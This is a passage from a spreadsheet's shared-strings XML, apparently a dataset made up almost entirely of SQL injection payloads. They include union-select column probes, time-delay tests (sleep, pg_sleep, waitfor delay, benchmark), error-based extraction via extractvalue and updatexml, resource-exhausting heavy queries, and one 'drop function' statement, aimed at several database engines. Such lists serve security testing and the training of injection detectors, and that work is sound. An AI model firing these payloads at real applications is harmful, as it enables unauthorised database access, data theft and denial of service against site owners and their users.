    <t>1" where 1203 = 1203 union all select null,null,null--</t>
  </si>
  <si>
    <t>-3649"  )  )   as eydu where 3220 = 3220 or elt ( 8705 = 1510,1510 ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1" rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo ) </t>
  </si>
  <si>
    <t>1" )  where 4849 = 4849 or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1'|| ( select 'tzxr' from dual where 2934 = 2934 and 4595 = 4595#</t>
  </si>
  <si>
    <t>select pg_sleep ( 5 )  and   (  (   ( "wqeb" = "wqeb</t>
  </si>
  <si>
    <t>1  )  )   or elt ( 6272 = 6272,sleep ( 5  )  )   and   (  (  8024 = 8024</t>
  </si>
  <si>
    <t>1" )  as jrse where 9185 = 9185 and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>1%"  )  )   order by 1#</t>
  </si>
  <si>
    <t>-1150' )  as hdby where 4032 = 4032 union all select 4032,4032,4032,4032,4032,4032,4032,4032,4032,4032--</t>
  </si>
  <si>
    <t>1 )  as uhmm where 2304 = 2304 union all select null#</t>
  </si>
  <si>
    <t>1" or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>1  )  )   as skex where 7941 = 7941 and sleep ( 5 ) --</t>
  </si>
  <si>
    <t>1' where 9381 = 9381</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3#</t>
  </si>
  <si>
    <t>1'  )  )   as stnn where 6160 = 6160 and 8881 = 7347--</t>
  </si>
  <si>
    <t>1 and elt ( 8853 = 1675,1675 ) -- jegm</t>
  </si>
  <si>
    <t>select  ( case when  ( 2768 = 8868 )  then 2768 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>1 where 2292 = 2292 union all select null,null,null,null#</t>
  </si>
  <si>
    <t xml:space="preserve">1 or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) </t>
  </si>
  <si>
    <t>-1366' or make_set ( 9354 = 9354,7185 )  and 'abre' = 'abre</t>
  </si>
  <si>
    <t>-6086" union all select 8700,8700,8700,8700--</t>
  </si>
  <si>
    <t>select sleep ( 5 )  and "jvys" like "jvys</t>
  </si>
  <si>
    <t>1'  )  )   as sxpk where 5524 = 5524 and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) --</t>
  </si>
  <si>
    <t>select  ( case when  ( 9388 = 4322 )  then 1 else 9388* ( select 9388 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>1'+ ( select ankx where 6789 = 6789</t>
  </si>
  <si>
    <t>1' where 4880 = 4880 and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) --</t>
  </si>
  <si>
    <t>-2007%'  )  )   union all select 7298,7298,7298#</t>
  </si>
  <si>
    <t>1 )  where 5944 = 5944 and  ( 4446 = 8843 ) *8843--</t>
  </si>
  <si>
    <t>1' where 5455 = 5455 and sleep ( 5 ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'yydv' from dual where 9639 = 9639</t>
  </si>
  <si>
    <t>1'  )  )   or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (  'ykoz' = 'ykoz</t>
  </si>
  <si>
    <t xml:space="preserve">1, ( select  ( case when  ( 8392 = 8404 )  then 1 else 8392* ( select 8392 from information_schema.character_sets )  end  )  )  </t>
  </si>
  <si>
    <t>1'  )  )   )  or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (   ( 'gmbd' = 'gmbd</t>
  </si>
  <si>
    <t>1%"  )  )   )  rlike sleep ( 5 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1" )  where 7514 = 7514</t>
  </si>
  <si>
    <t>-2849' union all select 6491,6491,6491,6491,6491,6491,6491--</t>
  </si>
  <si>
    <t>1 or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) -- ctdx</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) </t>
  </si>
  <si>
    <t>1" and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1" where 9756 = 9756</t>
  </si>
  <si>
    <t>-6681" )  or 5251 = 1162</t>
  </si>
  <si>
    <t>1' where 6721 = 6721 union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and  ( "cwat" like "cwat</t>
  </si>
  <si>
    <t>-3442' in boolean mode )  union all select 6255,6255,6255,6255,6255#</t>
  </si>
  <si>
    <t>1%" or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and "%" = "</t>
  </si>
  <si>
    <t>select * from generate_series ( 1488,1488,case when  ( 1488 = 1685 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>1'|| ( select 'ybfo' from dual where 3319 = 3319 union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-2165' where 6593 = 6593 or 9158 = 7254--</t>
  </si>
  <si>
    <t>1' in boolean mode )  and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t xml:space="preserve">-4289' or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  ) </t>
  </si>
  <si>
    <t>1'|| ( select 'hshf' where 9073 = 9073 and 7533 = 7533 ) ||'</t>
  </si>
  <si>
    <t>1'  )  )   as vqrt where 5173 = 5173 and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1 where 4319 = 4319 and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1"  )  )   as aamh where 7432 = 7432  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users ) --</t>
  </si>
  <si>
    <t>select  ( case when  ( 1743 = 5698 )  then 1743 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>1" )  or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>-1854' )  as fmmq where 7326 = 7326 or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr</t>
  </si>
  <si>
    <t>-5691' union all select 6610,6610#</t>
  </si>
  <si>
    <t>1" )  where 1300 = 1300 order by 1#</t>
  </si>
  <si>
    <t>1%" )  or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1'  )  )   as dqdv where 8126 = 8126 and 4595 = 4595#</t>
  </si>
  <si>
    <t>1"  )  )   union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1"  )  )   or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and   (  (  "umst" = "umst</t>
  </si>
  <si>
    <t>-1487" )  as crfi where 2407 = 2407 union all select 2407,2407,2407,2407,2407,2407,2407,2407,2407,2407--</t>
  </si>
  <si>
    <t>1" )  where 4112 = 4112</t>
  </si>
  <si>
    <t>1' )  where 8575 = 8575 and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>-4327" or make_set ( 3107 = 1781,1781 )  and "lclf" like "lclf</t>
  </si>
  <si>
    <t>1 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) -- bqxe</t>
  </si>
  <si>
    <t>1'  )  )   or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (  'esma' like 'esma</t>
  </si>
  <si>
    <t>1'  )  )   or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and   (  (  'jfwt' like 'jfwt</t>
  </si>
  <si>
    <t>1" )  and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and  ( "pdsy" like "pdsy</t>
  </si>
  <si>
    <t>if ( 6554 = 1534 )  select 6554 else drop function buqb--</t>
  </si>
  <si>
    <t>1"  )  )   or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and   (  (  "iuxs" like "iuxs</t>
  </si>
  <si>
    <t>-9505'  )  )   )  or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 )</t>
  </si>
  <si>
    <t>1"  )  )   )  rlike  ( select  ( case when  ( 6915 = 4531 )  then 1 else 0x28 end  )  )   and   (  (   ( "jzzu" = "jzzu</t>
  </si>
  <si>
    <t>-1015"  )  )   union all select 6624,6624#</t>
  </si>
  <si>
    <t>1 )  where 2170 = 2170</t>
  </si>
  <si>
    <t>1' )  where 5317 = 5317 and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1%' )  or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>1' in boolean mode )  or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>-3349' or elt ( 6610 = 4379,4379 )  and 'poqm' like 'poqm</t>
  </si>
  <si>
    <t>1 )  order by 1#</t>
  </si>
  <si>
    <t>1'  )  )   as sojl where 8710 = 8710 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1' in boolean mode )  or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  #</t>
  </si>
  <si>
    <t>1%" or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and "%" = "</t>
  </si>
  <si>
    <t xml:space="preserve">1" or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) </t>
  </si>
  <si>
    <t>-1203"  )  )   or 8571 = 8571--</t>
  </si>
  <si>
    <t>1 )  where 2020 = 2020 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and   (  (  'boud' = 'boud</t>
  </si>
  <si>
    <t>1  )  )   union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>select * from generate_series ( 3180,3180,case when  ( 3180 = 4445 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>1'  )  )   as nuku where 7009 = 7009 union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>1'|| ( select 'ifts' from dual where 6329 = 6329</t>
  </si>
  <si>
    <t xml:space="preserve"> end and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1%'  )  )   union all select null--</t>
  </si>
  <si>
    <t>1'+ ( select lang where 4191 = 4191 union all select null,null#</t>
  </si>
  <si>
    <t xml:space="preserve">-1737' or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) </t>
  </si>
  <si>
    <t>1' in boolean mode )  or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  #</t>
  </si>
  <si>
    <t>1" )  where 8953 = 8953 or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1 union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1%" )  order by 1--</t>
  </si>
  <si>
    <t>1' )  or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>select  ( case when  ( 5704 = 4125 )  then 5704 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>1  )  )   as xlww where 5844 = 5844</t>
  </si>
  <si>
    <t>1 where 4245 = 4245</t>
  </si>
  <si>
    <t>1 and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) # odvp</t>
  </si>
  <si>
    <t>1' )  where 1369 = 1369 and 4840 = 1697#</t>
  </si>
  <si>
    <t>select * from generate_series ( 7237,7237,case when  ( 7237 = 9757 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t xml:space="preserve">iif ( 9007 = 3836,1,1/0 ) </t>
  </si>
  <si>
    <t xml:space="preserve">1" and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) </t>
  </si>
  <si>
    <t>1  )  )   as npdl where 5796 = 5796 and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1%'  )  )   and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1' )  where 8118 = 8118</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>-2733'  )  )   )  or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) |</t>
  </si>
  <si>
    <t>1' where 6359 = 6359 and  ( 3020 = 3020 ) *6703--</t>
  </si>
  <si>
    <t>1' )  union all select null,null--</t>
  </si>
  <si>
    <t>1' )  as woka where 4316 = 4316 and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1"  )  )   )  or sleep ( 5 )  and   (  (   ( "hdis" like "hdis</t>
  </si>
  <si>
    <t>1" )  union all select null,null--</t>
  </si>
  <si>
    <t>select  ( case when  ( 5914 = 2314 )  then 5914 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>1 union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1" )  or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and  ( "ponv" = "ponv</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and   (  (  "qkat" = "qkat</t>
  </si>
  <si>
    <t>-9389' where 5713 = 5713 union all select 5713,5713,5713,5713,5713,5713,5713,5713--</t>
  </si>
  <si>
    <t>1"  )  )   )  or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1  )  )   as ztcn where 1043 = 1043 and 6305 = 5785--</t>
  </si>
  <si>
    <t>1%" )  and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and  ( "%" = "</t>
  </si>
  <si>
    <t>1' and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and 'lgat' like 'lgat</t>
  </si>
  <si>
    <t>1" )  and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( "kkim" = "kkim</t>
  </si>
  <si>
    <t>1 where 4940 = 4940</t>
  </si>
  <si>
    <t xml:space="preserve"> end and 'icny' like 'icny</t>
  </si>
  <si>
    <t>1" )  where 2445 = 2445</t>
  </si>
  <si>
    <t>1 where 5859 = 5859 or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5' and   (  (   ( 'hrta' = 'hrta</t>
  </si>
  <si>
    <t>-7032' )  as xmmm where 5635 = 5635 union all select 5635,5635,5635,5635,5635--</t>
  </si>
  <si>
    <t>-7544"  )  )   union all select 3808,3808,3808,3808--</t>
  </si>
  <si>
    <t>1"  )  )   and sleep ( 5 )  and   (  (  "timv" = "timv</t>
  </si>
  <si>
    <t>1'|| ( select 'xglm' from dual where 3556 = 3556 or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1%"  )  )   )  and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) </t>
  </si>
  <si>
    <t>-5891 )  where 5792 = 5792 union all select 5792,5792,5792,5792,5792#</t>
  </si>
  <si>
    <t>1'  )  )   and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (  'sied' = 'sied</t>
  </si>
  <si>
    <t>-4363%'  )  )   )  or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1" )  as vqkz where 8536 = 8536</t>
  </si>
  <si>
    <t xml:space="preserve">1 and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) </t>
  </si>
  <si>
    <t>1" )  where 5794 = 5794 union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-1490'|| ( select 'uzbm' from dual where 3181 = 3181 union all select 3181,3181,3181,3181,3181--</t>
  </si>
  <si>
    <t>1"  )  )   ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and   (  (  "ffcf" like "ffcf</t>
  </si>
  <si>
    <t>1' )  rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and  ( 'mizk' = 'mizk</t>
  </si>
  <si>
    <t>1 )  as ocut where 6800 = 6800 and elt ( 4249 = 4249,7259 ) --</t>
  </si>
  <si>
    <t>1%'  )  )   and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1  )  )   as ogcv where 4396 = 4396</t>
  </si>
  <si>
    <t>select  ( case when  ( 7385 = 8723 )  then 7385 else 7385* ( select 7385 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) </t>
  </si>
  <si>
    <t xml:space="preserve">1" or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) </t>
  </si>
  <si>
    <t xml:space="preserve"> ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and   (  (  'stea' = 'stea</t>
  </si>
  <si>
    <t>1"  )  )   )  and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and   (  (   ( "dnlz" = "dnlz</t>
  </si>
  <si>
    <t xml:space="preserve">-7230' )  or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 </t>
  </si>
  <si>
    <t>1 where 7412 = 7412 and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>-8888%' )  union all select 5312,5312,5312,5312,5312,5312,5312,5312--</t>
  </si>
  <si>
    <t>1%"  )  )   )  union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>1' in boolean mode )  waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>1  )  )   and 9198 = 9198--</t>
  </si>
  <si>
    <t>1%" union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t xml:space="preserve">1, ( select  ( case when  ( 8596 = 8596 )  then 1 else 8596* ( select 8596 from mysql.db )  end  )  )  </t>
  </si>
  <si>
    <t>1" or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and "ljkg" = "ljkg</t>
  </si>
  <si>
    <t>select case when 1238 = 9044 then 1 else null end--</t>
  </si>
  <si>
    <t xml:space="preserve">1" and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) </t>
  </si>
  <si>
    <t>1 )  as fhvr where 5544 = 5544</t>
  </si>
  <si>
    <t>1%'  )  )   or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and   (  (  '%' = '</t>
  </si>
  <si>
    <t>-4639"  )  )   )  or 8550 = 9348</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5' and   (  (  "zili" like "zili</t>
  </si>
  <si>
    <t>1" )  as cysq where 5258 = 5258</t>
  </si>
  <si>
    <t>-1106'  )  )   union all select 2855,2855,2855,2855,2855,2855,2855#</t>
  </si>
  <si>
    <t>1"  )  )   as irrz where 8730 = 8730 order by 1#</t>
  </si>
  <si>
    <t>-4339 )  where 7178 = 7178 or 4008 = 7232</t>
  </si>
  <si>
    <t xml:space="preserve">-3105' or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   </t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and   (  (  "sfnj" like "sfnj</t>
  </si>
  <si>
    <t>1" )  as zbhs where 2017 = 2017 or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) --</t>
  </si>
  <si>
    <t>1" )  and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and  ( "ppml" = "ppml</t>
  </si>
  <si>
    <t>1" )  as obbk where 6414 = 6414 and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) --</t>
  </si>
  <si>
    <t>-4728"  )  )   as ndri where 3278 = 3278 or make_set ( 9354 = 9354,7185 ) --</t>
  </si>
  <si>
    <t>1"  )  )   and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (  "kpwc" like "kpwc</t>
  </si>
  <si>
    <t>1" and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>-7378' union all select 2071,2071,2071,2071,2071,2071,2071--</t>
  </si>
  <si>
    <t>-4072%"  )  )   )  or 3999 = 1979</t>
  </si>
  <si>
    <t>1%' union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1%' and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and '%' = '</t>
  </si>
  <si>
    <t>1  )  )   or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (  4277 = 4277</t>
  </si>
  <si>
    <t>1'+ ( select 'vidl' where 9445 = 9445 and 5498 = 5777#</t>
  </si>
  <si>
    <t>1' )  as imgv where 7802 = 7802</t>
  </si>
  <si>
    <t>1"  )  )   )  and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1%' union all select null,null--</t>
  </si>
  <si>
    <t>1'|| ( select 'skds' from dual where 8594 = 8594 and make_set ( 6779 = 2027,2027  )  )  ||'</t>
  </si>
  <si>
    <t>-2912" )  as eizh where 2223 = 2223 or make_set ( 1041 = 3056,3056 ) --</t>
  </si>
  <si>
    <t>1 )  as eryo where 2531 = 2531 rlike sleep ( 5 ) --</t>
  </si>
  <si>
